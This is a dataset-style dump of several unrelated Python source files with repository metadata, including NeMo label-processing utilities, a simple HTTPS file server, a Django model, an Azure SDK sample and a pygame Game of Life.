e6e492a0ce1247655b69757dedda44645ef50458 | 0fba29dd8bb4e8e6a5d12b54d8f09d5b5c835576 | /23_personal/test.py | 143a4fd013f75e1d07534c24c9c78ee0f8d1ff23 | [] | no_license | buxuele/100-days-of-code | 4d37ab955d0cd463a1dd40ca298dac710c84237d | 58c326aca1425911a6979b1a9e305e0a3ed1b0d4 | refs/heads/master | 2020-04-25T23:10:22.816754 | 2019-05-11T01:00:21 | 2019-05-11T01:00:21 | 173,136,028 | 0 | 0 | null | 2019-04-11T20:42:42 | 2019-02-28T15:22:08 | HTML | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/python3
# Time: 2019/04/24 10:19 PM
# \u7f8a\u7531\u5927\u4e95\592b\u5927\u4eba\u738b\u4e2d\u5de5
import codecs
gg = '\346\203\263\347\234\213\346\255\243\351\235\242\357\274\237\351\202\243\345\260\261\350\246\201\347\234\213\344\273\224\347\273\206\344\272\206\357\274\201'.encode("utf-8")
print(type(gg))
# a = codecs.decode(gg, "")
# print(a)
| [
"baogebuxuele@163.com"
] | baogebuxuele@163.com |
d80766c27a44af916ff6ef4330c81821db07f418 | b9fdfa1ad9315f54f198ab7d918f59e2c45b95ed | /additional_pipelines_used_in_LIFE/preprocessing_ica_aroma/build/keepalive/keepalive/__init__.py | 65dd57b5cad491357173661182777a54bb457052 | [] | no_license | fBeyer89/LIFE_rs_ICA_preprocessing | 4829e8282b06918aa4e610b26e9e0f0c5545b8b5 | 4868bf2d734d0dab89fc21f876aca400e1de1a5f | refs/heads/master | 2021-01-10T12:09:04.050976 | 2019-04-18T13:05:47 | 2019-04-18T13:05:47 | 44,090,982 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | # -*- coding: utf-8 -*-
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
# This file was part of urlgrabber, a high-level cross-protocol url-grabber
# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko
# Copyright 2015 Sergio Fernández
from keepalive import *
__version__ = "0.5"
| [
"fbeyer@cbs.mpg.de"
] | fbeyer@cbs.mpg.de |
0e5e071104c431a893ca44a126aeda1409c77336 | a045055cb41f7d53e1b103c3655a17dc4cd18d40 | /python-master/kubernetes/test/test_v1_role_list.py | ce35aa97b1362b07e046028323570ffbd4a54b7c | [] | no_license | 18271693176/copy | 22f863b180e65c049e902de0327f1af491736e5a | ff2511441a2df03817627ba8abc6b0e213878023 | refs/heads/master | 2020-04-01T20:20:28.048995 | 2018-11-05T02:21:53 | 2018-11-05T02:21:53 | 153,599,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_role_list import V1RoleList
class TestV1RoleList(unittest.TestCase):
""" V1RoleList unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1RoleList(self):
"""
Test V1RoleList
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_role_list.V1RoleList()
pass
if __name__ == '__main__':
unittest.main()
| [
"906317366@qq.com"
] | 906317366@qq.com |
4bf1b976b01d1825146b5147af5e3ab534fd4d6c | 2dd26e031162e75f37ecb1f7dd7f675eeb634c63 | /nemo/collections/nlp/data/token_classification/token_classification_utils.py | 94acd69d3b11374984fa4e13ef269755039d8c70 | [
"Apache-2.0"
] | permissive | NVIDIA/NeMo | 1b001fa2ae5d14defbfd02f3fe750c5a09e89dd1 | c20a16ea8aa2a9d8e31a98eb22178ddb9d5935e7 | refs/heads/main | 2023-08-21T15:28:04.447838 | 2023-08-21T00:49:36 | 2023-08-21T00:49:36 | 200,722,670 | 7,957 | 1,986 | Apache-2.0 | 2023-09-14T18:49:54 | 2019-08-05T20:16:42 | Python | UTF-8 | Python | false | false | 7,468 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import re
import string
from typing import Dict
from nemo.collections.nlp.data.data_utils.data_preprocessing import (
fill_class_weights,
get_freq_weights,
get_label_stats,
)
from nemo.utils import logging
__all__ = ['get_label_ids', 'create_text_and_labels']
def remove_punctuation(word: str):
"""
Removes all punctuation marks from a word except for '
that is often a part of word: don't, it's, and so on
"""
all_punct_marks = string.punctuation.replace("'", '')
return re.sub('[' + all_punct_marks + ']', '', word)
def create_text_and_labels(output_dir: str, file_path: str, punct_marks: str = ',.?'):
"""
Create datasets for training and evaluation.
Args:
output_dir: path to the output data directory
file_path: path to file name
punct_marks: supported punctuation marks
The data will be split into 2 files: text.txt and labels.txt. \
Each line of the text.txt file contains text sequences, where words\
are separated with spaces. The labels.txt file contains \
corresponding labels for each word in text.txt, the labels are \
separated with spaces. Each line of the files should follow the \
format: \
[WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and \
[LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
"""
if not os.path.exists(file_path):
raise ValueError(f'{file_path} not found')
os.makedirs(output_dir, exist_ok=True)
base_name = os.path.basename(file_path)
labels_file = os.path.join(output_dir, 'labels_' + base_name)
text_file = os.path.join(output_dir, 'text_' + base_name)
with open(file_path, 'r') as f:
with open(text_file, 'w') as text_f:
with open(labels_file, 'w') as labels_f:
for line in f:
line = line.split()
text = ''
labels = ''
for word in line:
label = word[-1] if word[-1] in punct_marks else 'O'
word = remove_punctuation(word)
if len(word) > 0:
if word[0].isupper():
label += 'U'
else:
label += 'O'
word = word.lower()
text += word + ' '
labels += label + ' '
text_f.write(text.strip() + '\n')
labels_f.write(labels.strip() + '\n')
print(f'{text_file} and {labels_file} created from {file_path}.')
def get_label_ids(
    label_file: str,
    is_training: bool = False,
    pad_label: str = 'O',
    label_ids_dict: Dict[str, int] = None,
    get_weights: bool = True,
    class_labels_file_artifact='label_ids.csv',
):
    """
    Generates str to int labels mapping for training data or checks correctness of the label_ids_dict
    file for non-training files or if label_ids_dict is specified

    Args:
        label_file: the path of the label file to process
        is_training: indicates whether the label_file is used for training
        pad_label: token used for padding
        label_ids_dict: str label name to int ids mapping. Required for non-training data.
            If specified, the check that all labels from label_file are present in label_ids_dict will be performed.
            For training data, if label_ids_dict is None, a new mapping will be generated from label_file.
        get_weights: set to True to calculate class weights, required for Weighted Loss.
        class_labels_file_artifact: name of the file to save in .nemo

    Returns:
        Tuple of (label_ids_dict, path of the saved label-ids file, class weights or None).
    """
    if not os.path.exists(label_file):
        raise ValueError(f'File {label_file} was not found.')

    logging.info(f'Processing {label_file}')
    if not is_training and label_ids_dict is None:
        raise ValueError(
            f'For non training data, label_ids_dict created during preprocessing of the training data '
            f'should be provided'
        )

    # collect all labels from the label_file
    data_dir = os.path.dirname(label_file)
    # bug fix: set(pad_label) would split a multi-character pad label into its
    # individual characters; a one-element set literal keeps it intact
    unique_labels = {pad_label}
    all_labels = []
    with open(label_file, 'r') as f:
        for line in f:
            line = line.strip().split()
            all_labels.extend(line)
            unique_labels.update(line)

    # check that all labels from label_file are present in the specified label_ids_dict
    # or generate label_ids_dict from data (for training only)
    if label_ids_dict:
        logging.info(f'Using provided labels mapping {label_ids_dict}')
        for name in unique_labels:
            if name not in label_ids_dict:
                raise ValueError(f'{name} class from {label_file} not found in the provided mapping: {label_ids_dict}')
    else:
        # pad label always gets id 0; remaining labels are ordered alphabetically
        label_ids_dict = {pad_label: 0}
        if pad_label in unique_labels:
            unique_labels.remove(pad_label)
        for label in sorted(unique_labels):
            label_ids_dict[label] = len(label_ids_dict)

    label_ids_filename = os.path.join(data_dir, class_labels_file_artifact)
    if is_training:
        with open(label_ids_filename, 'w') as f:
            labels, _ = zip(*sorted(label_ids_dict.items(), key=lambda x: x[1]))
            f.write('\n'.join(labels))
        logging.info(f'Labels mapping {label_ids_dict} saved to : {label_ids_filename}')

    # calculate label statistics
    base_name = os.path.splitext(os.path.basename(label_file))[0]
    stats_file = os.path.join(data_dir, f'{base_name}_label_stats.tsv')
    if os.path.exists(stats_file) and not is_training and not get_weights:
        logging.info(f'{stats_file} found, skipping stats calculation.')
    else:
        all_labels = [label_ids_dict[label] for label in all_labels]
        logging.info(f'Three most popular labels in {label_file}:')
        total_labels, label_frequencies, max_id = get_label_stats(all_labels, stats_file)
        logging.info(f'Total labels: {total_labels}. Label frequencies - {label_frequencies}')

    if get_weights:
        class_weights_pkl = os.path.join(data_dir, f'{base_name}_weights.p')
        if os.path.exists(class_weights_pkl):
            # NOTE: unpickling is only safe because this cache file is produced
            # locally by the branch below; never point it at untrusted data.
            # Using "with" fixes the file-handle leak of the original code.
            with open(class_weights_pkl, 'rb') as weights_f:
                class_weights = pickle.load(weights_f)
            logging.info(f'Class weights restored from {class_weights_pkl}')
        else:
            class_weights_dict = get_freq_weights(label_frequencies)
            logging.info(f'Class Weights: {class_weights_dict}')
            class_weights = fill_class_weights(class_weights_dict, max_id)
            with open(class_weights_pkl, "wb") as weights_f:
                pickle.dump(class_weights, weights_f)
            logging.info(f'Class weights saved to {class_weights_pkl}')
    else:
        class_weights = None

    return label_ids_dict, label_ids_filename, class_weights
| [
"noreply@github.com"
] | NVIDIA.noreply@github.com |
ce764895f86745e70087150b9abf4c75d5737670 | 5fe72bb13baf3649058ebe11aa86ad4fc56c69ed | /hard-gists/6194556/snippet.py | b70124de919065b567273fb101936d8671b21e0e | [
"Apache-2.0"
] | permissive | dockerizeme/dockerizeme | 8825fed45ff0ce8fb1dbe34959237e8048900a29 | 408f3fa3d36542d8fc1236ba1cac804de6f14b0c | refs/heads/master | 2022-12-10T09:30:51.029846 | 2020-09-02T13:34:49 | 2020-09-02T13:34:49 | 144,501,661 | 24 | 20 | Apache-2.0 | 2022-11-21T12:34:29 | 2018-08-12T21:21:04 | Python | UTF-8 | Python | false | false | 1,312 | py | '''
SimpleHTTPServerSSL.py - simple HTTP server supporting SSL/TLS. I.e. HTTPS. For python 3.3
- replace CERT and KEY with the location of your .pem server file.
- the default port is 443.
usage: python SimpleHTTPServerSSL.py
based on http://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/
'''
import socket, os
from socketserver import BaseServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import ssl
# PEM files holding the server certificate and its private key; replace with
# the paths to your own files (see the module docstring).
CERT = 'ssl.crt.pem'
KEY = 'ssl.key.pem'
class SecureHTTPServer(HTTPServer):
    """HTTPServer variant whose listening socket is wrapped in SSL/TLS."""

    def __init__(self, server_address, HandlerClass):
        # Skip HTTPServer.__init__ (which would bind a plain socket) and do the
        # base setup ourselves so we can substitute a TLS-wrapped socket first.
        BaseServer.__init__(self, server_address, HandlerClass)
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.load_cert_chain(certfile=CERT, keyfile=KEY)
        plain_socket = socket.socket(self.address_family, self.socket_type)
        self.socket = context.wrap_socket(plain_socket, server_side=True)
        self.server_bind()
        self.server_activate()
def test(HandlerClass = SimpleHTTPRequestHandler,
         ServerClass = SecureHTTPServer):
    """Serve the current directory over HTTPS on port 443 until interrupted."""
    server_address = ('', 443) # (address, port); '' = all interfaces
    httpd = ServerClass(server_address, HandlerClass)
    host, port = httpd.socket.getsockname()[:2]
    print("Serving HTTPS on", host, "port", port, "...")
    httpd.serve_forever()

if __name__ == '__main__':
    test()
"42325807+dockerizeme@users.noreply.github.com"
] | 42325807+dockerizeme@users.noreply.github.com |
0e2625b5eeb8fad171f69a84170920695873a752 | 3c8701e04900389adb40a46daedb5205d479016c | /oldboy-python18/day18-model/day18/cms/cms/app01/models.py | 10494d9551d007fb7aaff17983302a15f712c02e | [] | no_license | huboa/xuexi | 681300653b834eaf506f49987dcca83df48e8db7 | 91287721f188b5e24fbb4ccd63b60a80ed7b9426 | refs/heads/master | 2020-07-29T16:39:12.770272 | 2018-09-02T05:39:45 | 2018-09-02T05:39:45 | 73,660,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from django.db import models
# Create your models here.
class Book(models.Model):
    """A book record: title, publication date, price and publisher name."""
    # explicit auto-incrementing primary key (Django would add one implicitly)
    id=models.AutoField(primary_key=True)
    title=models.CharField(max_length=32)
    pubDate=models.DateField()
    # up to 9999.99: six digits total, two of them after the decimal point
    price=models.DecimalField(max_digits=6,decimal_places=2)
    publish=models.CharField(max_length=32)
"wxcr11@gmail.com"
] | wxcr11@gmail.com |
ed6332db56631c9ab5f726d3b84ed62bdbee475a | b12adda0b77dba851f1a09b92c4553da6333ffaf | /tools/ttn/ttn_constants.py | a98a422d1e567b66e82d1b1ed6ab5664371204a1 | [] | no_license | Vignesh2208/Titan | c9a86e236e150b1de80d5054b48b9bc482d2785b | 3366200b47c6f81fc8cafb449307325f7cf45da0 | refs/heads/master | 2021-06-22T01:58:10.836590 | 2021-04-14T22:31:33 | 2021-04-14T22:31:33 | 213,460,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,155 | py | """Some constants used by ttn application."""
import os
TTN_FOLDER_NAME = '.ttn'
TTN_CONFIG_DIR = f'{os.path.expanduser("~")}/{TTN_FOLDER_NAME}'
PROJECT_NAME_KEY = 'PROJECT_NAME'
PROJECT_SRC_DIR_KEY = 'PROJECT_SRC_DIR'
PROJECT_CLANG_INIT_PARAMS_KEY = 'PROJECT_CLANG_INIT_PARAMS'
PROJECT_CLANG_LOCK_KEY = 'PROJECT_CLANG_LOCK'
PROJECT_ARCH_NAME = 'PROJECT_ARCH_NAME'
PROJECT_ARCH_TIMINGS_PATH_KEY = 'PROJECT_ARCH_TIMINGS_PATH'
BBL_COUNTER_KEY = 'BBL_Counter'
LOOP_COUNTER_KEY = 'Loop_Counter'
NIC_SPEED_MBPS_KEY = 'NIC_SPEED_MBPS'
CPU_CYCLE_NS_KEY = 'CPU_CYCLES_NS'
ROB_SIZE_KEY = 'ROB_SIZE'
DISPATCH_UNITS_KEY = 'DISPATCH_UNITS'
TIMING_MODEL_KEY = 'TIMING_MODEL'
# TODO: For now we only support one level of cache modelling i.e L1 cache
L1_INS_CACHE_SIZE_KEY = 'L1_INS_CACHE_SIZE_KB'
L1_INS_CACHE_LINES_SIZE_KEY = 'L1_INS_CACHE_LINE_SIZE'
L1_INS_CACHE_REPLACEMENT_POLICY_KEY = 'L1_INS_CACHE_REPLACEMENT_POLICY'
L1_INS_CACHE_MISS_CYCLES_KEY = 'L1_INS_CACHE_MISS_CYCLES'
L1_INS_CACHE_ASSOCIATIVITY_KEY = 'L1_INS_CACHE_ASSOCIATIVITY'
L1_DATA_CACHE_SIZE_KEY = 'L1_DATA_CACHE_SIZE_KB'
L1_DATA_CACHE_LINES_SIZE_KEY = 'L1_DATA_CACHE_LINE_SIZE'
L1_DATA_CACHE_REPLACEMENT_POLICY_KEY = 'L1_DATA_CACHE_REPLACEMENT_POLICY'
L1_DATA_CACHE_MISS_CYCLES_KEY = 'L1_DATA_CACHE_MISS_CYCLES'
L1_DATA_CACHE_ASSOCIATIVITY_KEY = 'L1_DATA_CACHE_ASSOCIATIVITY'
DEFAULT_PROJECT_NAME = 'DEFAULT'
DEFAULT_PROJECT_ARCH = 'NONE'
DEFAULT_PROJECT_SRC_DIR = '/tmp'
DEFAULT_NIC_SPEED_MBPS = 1000
# TODO: For now we only support one level of cache modelling i.e L1 cache
# Associativity = 1 <=> Direct-Mapped cache
DEFAULT_L1_INS_CACHE_ASSOCIATIVITY = 8
DEFAULT_L1_INS_CACHE_SIZE_KB = 32
DEFAULT_L1_INS_CACHE_LINE_SIZE_BYTES = 64
DEFAULT_L1_INS_CACHE_REPLACEMENT_POLICY = 'LRU'
DEFAULT_L1_INS_CACHE_MISS_CYCLES = 100
# Associativity = 1 <=> Direct-Mapped cache
DEFAULT_L1_DATA_CACHE_ASSOCIATIVITY = 8
DEFAULT_L1_DATA_CACHE_SIZE_KB = 32
DEFAULT_L1_DATA_CACHE_LINE_SIZE_BYTES = 64
DEFAULT_L1_DATA_CACHE_REPLACEMENT_POLICY = 'LRU'
DEFAULT_L1_DATA_CACHE_MISS_CYCLES = 100
DEFAULT_ROB_SIZE = 1024
DEFAULT_NUM_DISPATCH_UNITS = 8
DEFAULT_TIMING_MODEL = 'EMPIRICAL'
NO_ARCH = 'ARCH_NONE'
| [
"vig2208@gmail.com"
] | vig2208@gmail.com |
7240b19f703621f84a9c3c19e6eaa79a91bd1429 | c29f7a8c6c9fae126bdef6c43bd1a1e2ebbaf556 | /day16/myarray.py | 4dfce1a910a5d5eaf8471d0c22ce2f43e850dad3 | [] | no_license | wnsgur5303/EducatedPython | 8c95746d821ea2842e624de3ee3e06f5d3ac6416 | bbd956807c3efcff8a4129a9eefa901475b49797 | refs/heads/master | 2023-04-06T18:17:40.914066 | 2021-04-15T07:31:12 | 2021-04-15T07:31:12 | 358,161,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | arr = [1,2,3,4,5]
print(arr[3:])
print(arr[:3]) | [
"wnsgur5303@gmail.com"
] | wnsgur5303@gmail.com |
d06972574b5df6446365a0de414d5d4a6a78d0d2 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/securitydevops/azure-mgmt-securitydevops/generated_samples/azure_dev_ops_org_get.py | 40d2f4d019e8bc017523654781724c90fb9e4c69 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,649 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.securitydevops import MicrosoftSecurityDevOps
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-securitydevops
# USAGE
python azure_dev_ops_org_get.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Create a SecurityDevOps management client and fetch one Azure DevOps org.

    Generated sample: prints the service response. Requires AZURE_CLIENT_ID,
    AZURE_TENANT_ID and AZURE_CLIENT_SECRET in the environment (see module
    docstring) and a real subscription id in place of the zero GUID.
    """
    client = MicrosoftSecurityDevOps(
        credential=DefaultAzureCredential(),
        subscription_id="00000000-0000-0000-0000-000000000000",
    )
    response = client.azure_dev_ops_org.get(
        resource_group_name="westusrg",
        azure_dev_ops_connector_name="testconnector",
        azure_dev_ops_org_name="myOrg",
    )
    print(response)
# x-ms-original-file: specification/securitydevops/resource-manager/Microsoft.SecurityDevOps/preview/2022-09-01-preview/examples/AzureDevOpsOrgGet.json
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
dbd811dd5df7010727684b4f4b84e20d4e19aec4 | 18430833920b3193d2f26ed526ca8f6d7e3df4c8 | /src/audit_trail/factories.py | 1c5f929866090df1f20621c64c05d9739653dd4a | [
"MIT"
] | permissive | providenz/phase | ed8b48ea51d4b359f8012e603b328adf13d5e535 | b0c46a5468eda6d4eae7b2b959c6210c8d1bbc60 | refs/heads/master | 2021-01-17T06:56:07.842719 | 2016-06-28T11:17:53 | 2016-06-28T11:17:53 | 47,676,508 | 0 | 0 | null | 2015-12-09T07:45:19 | 2015-12-09T07:45:18 | null | UTF-8 | Python | false | false | 379 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import factory
from factory import fuzzy
from accounts.factories import UserFactory
from .models import Activity
class ActivityFactory(factory.DjangoModelFactory):
    """Factory producing Activity fixtures: a fresh actor and a random verb."""
    class Meta:
        model = Activity
    actor = factory.SubFactory(UserFactory)
    # NOTE(review): zip(...)[0] only works on Python 2 (py3 zip objects are not
    # subscriptable) — picks the first column (verb codes) of VERB_CHOICES.
    verb = fuzzy.FuzzyChoice(zip(*Activity.VERB_CHOICES)[0])
| [
"lp@providenz.fr"
] | lp@providenz.fr |
2d7a63594e9b6b12e395a0d8dcef370df874978a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03739/s362994379.py | 1519886d81b2b0628ca8e5ba81794a786daf66d9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | n = int(input())
s = list(map(int, input().split()))
def cost(t):
    """Return the number of +1/-1 operations needed so that every prefix sum
    of the module-level list s is non-zero and alternates in sign, with the
    first prefix sum taking the sign of t (t is +1 or -1)."""
    res = 0
    sum = 0  # running prefix sum (shadows builtin sum; kept as-is)
    for y in s:
        sum += y
        if sum * t <= 0:
            # wrong sign (or zero): move the prefix sum to t, the nearest
            # value with the required sign and magnitude >= 1
            res += abs(sum - t)
            sum = t
        # the required sign alternates for the next prefix
        t *= -1
    return res
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
aca2d0c08f81edea01fb482800cfba161df2fc57 | 1a42c5a6e806deabb721c77619c9bc45bd01c78f | /lifegame.py | e271e25afc804ab32f5046372138895359d72099 | [] | no_license | nsakki55/smartinfo | 74f7ee2337518baef76812468b3f50785bcf4541 | 2777262a2c933d39bc35d1f9b674c8e374da63b7 | refs/heads/master | 2020-06-02T12:07:57.434869 | 2019-06-10T10:50:30 | 2019-06-10T10:50:30 | 191,149,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,751 | py | #!/usr/bin/env python
#coding:utf-8
import pygame
from pygame.locals import *
import random
import sys
import datetime
SCR_RECT = Rect(0, 0, 1440, 1080) # screen size
CS = 10 # cell size in pixels
NUM_ROW = int(SCR_RECT.height / CS) # number of field rows
NUM_COL = int(SCR_RECT.width / CS) # number of field columns
DEAD, ALIVE = 0, 1 # cell life/death constants
RAND_LIFE = 0.1 # probability used by rand() to bring a cell to life
class LifeGame:
    """Conway's Game of Life with a pygame UI.

    Keys: arrows move the cursor, space toggles a cell, s starts/stops the
    simulation, n steps one generation, c clears, r seeds random cells.
    Left mouse click toggles the clicked cell.
    """
    def __init__(self):
        dt_now=datetime.datetime.now()
        print(dt_now.microsecond)
        pygame.init()
        screen = pygame.display.set_mode(SCR_RECT.size)
        pygame.display.set_caption(u"Life Game")
        self.font = pygame.font.SysFont(None, 16)
        # NUM_ROW x NUM_COL field (2-D list of DEAD/ALIVE)
        self.field = [[DEAD for x in range(NUM_COL)] for y in range(NUM_ROW)]
        self.generation = 0 # generation counter
        self.run = False # is the simulation running?
        # NOTE(review): NUM_COL/2 is a float under Python 3; consumers cast
        # with int() before indexing — confirm pygame accepts the float
        # coordinates used for the cursor rect in draw()
        self.cursor = [NUM_COL/2, NUM_ROW/2] # cursor position
        # initialize the game
        self.clear()
        # main loop
        clock = pygame.time.Clock()
        while True:
            clock.tick(60)
            # dt_now=datetime.datetime.now()
            # print(dt_now.microsecond)
            self.update()
            self.draw(screen)
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == QUIT:
                    pygame.quit()
                    sys.exit()
                elif event.type == KEYDOWN:
                    if event.key == K_ESCAPE:
                        pygame.quit()
                        sys.exit()
                    # move the cursor with the arrow keys (clamped to the field)
                    elif event.key == K_LEFT:
                        self.cursor[0] -= 1
                        if self.cursor[0] < 0: self.cursor[0] = 0
                    elif event.key == K_RIGHT:
                        self.cursor[0] += 1
                        if self.cursor[0] > NUM_COL-1: self.cursor[0] = NUM_COL-1
                    elif event.key == K_UP:
                        self.cursor[1] -= 1
                        if self.cursor[1] < 0: self.cursor[1] = 0
                    elif event.key == K_DOWN:
                        self.cursor[1] += 1
                        if self.cursor[1] > NUM_ROW-1: self.cursor[1] = NUM_ROW-1
                    # space toggles the cell under the cursor
                    elif event.key == K_SPACE:
                        x, y = self.cursor
                        x=int(x)
                        y=int(y)
                        if self.field[y][x] == DEAD:
                            self.field[y][x] = ALIVE
                        elif self.field[y][x] == ALIVE:
                            self.field[y][x] = DEAD
                    # s starts/stops the simulation
                    elif event.key == K_s:
                        self.run = not self.run
                    # n advances a single generation
                    elif event.key == K_n:
                        self.step()
                    # c clears the field
                    elif event.key == K_c:
                        self.clear()
                    # r adds live cells at random
                    elif event.key == K_r:
                        self.rand()
                elif event.type == MOUSEBUTTONDOWN and event.button == 1:
                    # left click toggles the clicked cell
                    px, py = event.pos
                    x, y = px/CS, py/CS
                    x=int(x)
                    y=int(y)
                    self.cursor = [x, y]
                    if self.field[y][x] == DEAD:
                        self.field[y][x] = ALIVE
                    elif self.field[y][x] == ALIVE:
                        self.field[y][x] = DEAD
    def clear(self):
        """Reset the game: kill every cell, then seed a double-thick cross."""
        self.generation = 0
        for y in range(NUM_ROW):
            for x in range(NUM_COL):
                self.field[y][x] = DEAD
        for i in range(NUM_ROW):
            self.field[i][int(NUM_COL/2)]=ALIVE
        for i in range(NUM_ROW):
            self.field[i][int(NUM_COL/2)-1]=ALIVE
        for i in range(NUM_COL):
            self.field[int(NUM_ROW/2)][i]=ALIVE
        for i in range(NUM_COL):
            self.field[int(NUM_ROW/2)-1][i]=ALIVE
    def rand(self):
        """Randomly bring cells to life with probability RAND_LIFE."""
        for y in range(NUM_ROW):
            for x in range(NUM_COL):
                if random.random() < RAND_LIFE:
                    self.field[y][x] = ALIVE
    def update(self):
        """Advance the field by one generation if the simulation is running."""
        if self.run:
            self.step() # advance one generation
    def step(self):
        """Advance exactly one generation."""
        # the next field
        next_field = [[False for x in range(NUM_COL)] for y in range(NUM_ROW)]
        # fill the next field according to the rules of Life
        for y in range(NUM_ROW):
            for x in range(NUM_COL):
                num_alive_cells = self.around(x, y)
                if num_alive_cells == 2:
                    # exactly two live neighbours: the cell keeps its state
                    next_field[y][x] = self.field[y][x]
                elif num_alive_cells == 3:
                    # exactly three live neighbours: a cell is born
                    next_field[y][x] = ALIVE
                else:
                    # otherwise the cell dies (under/over-population)
                    next_field[y][x] = DEAD
        self.field = next_field
        self.generation += 1
    def draw(self, screen):
        """Draw the field, grid, centre lines, cursor and status text."""
        # draw the cells
        for y in range(NUM_ROW):
            for x in range(NUM_COL):
                if self.field[y][x] == ALIVE:
                    pygame.draw.rect(screen, (0,255,0), Rect(x*CS,y*CS,CS,CS))
                elif self.field[y][x] == DEAD:
                    pygame.draw.rect(screen, (0,0,0), Rect(x*CS,y*CS,CS,CS))
                pygame.draw.rect(screen, (50,50,50), Rect(x*CS,y*CS,CS,CS), 1) # grid
        # draw the centre lines
        pygame.draw.line(screen, (255,0,0), (0,SCR_RECT.height/2), (SCR_RECT.width,SCR_RECT.height/2))
        pygame.draw.line(screen, (255,0,0), (SCR_RECT.width/2,0), (SCR_RECT.width/2,SCR_RECT.height))
        # draw the cursor
        pygame.draw.rect(screen, (0,0,255), Rect(self.cursor[0]*CS,self.cursor[1]*CS,CS,CS), 1)
        # draw game info
        screen.blit(self.font.render("generation:%d" % self.generation, True, (0,255,0)), (0,0))
        # screen.blit(self.font.render("space : birth/kill", True, (0,255,0)), (0,12))
        # screen.blit(self.font.render("s : start/stop", True, (0,255,0)), (0,24))
        # screen.blit(self.font.render("n : next", True, (0,255,0)), (0,36))
        # screen.blit(self.font.render("r : random", True, (0,255,0)), (0,48))
    def around(self, x, y):
        """Return the number of live cells among the 8 neighbours of (x, y)."""
        # border cells are treated as having no live neighbours
        if x == 0 or x == NUM_COL-1 or y == 0 or y == NUM_ROW-1:
            return 0
        sum = 0
        sum += self.field[y-1][x-1] # top-left
        sum += self.field[y-1][x] # top
        sum += self.field[y-1][x+1] # top-right
        sum += self.field[y][x-1] # left
        sum += self.field[y][x+1] # right
        sum += self.field[y+1][x-1] # bottom-left
        sum += self.field[y+1][x] # bottom
        sum += self.field[y+1][x+1] # bottom-right
        return sum
if __name__ == "__main__":
    LifeGame()
| [
"n.sakki55@gmail.com"
] | n.sakki55@gmail.com |
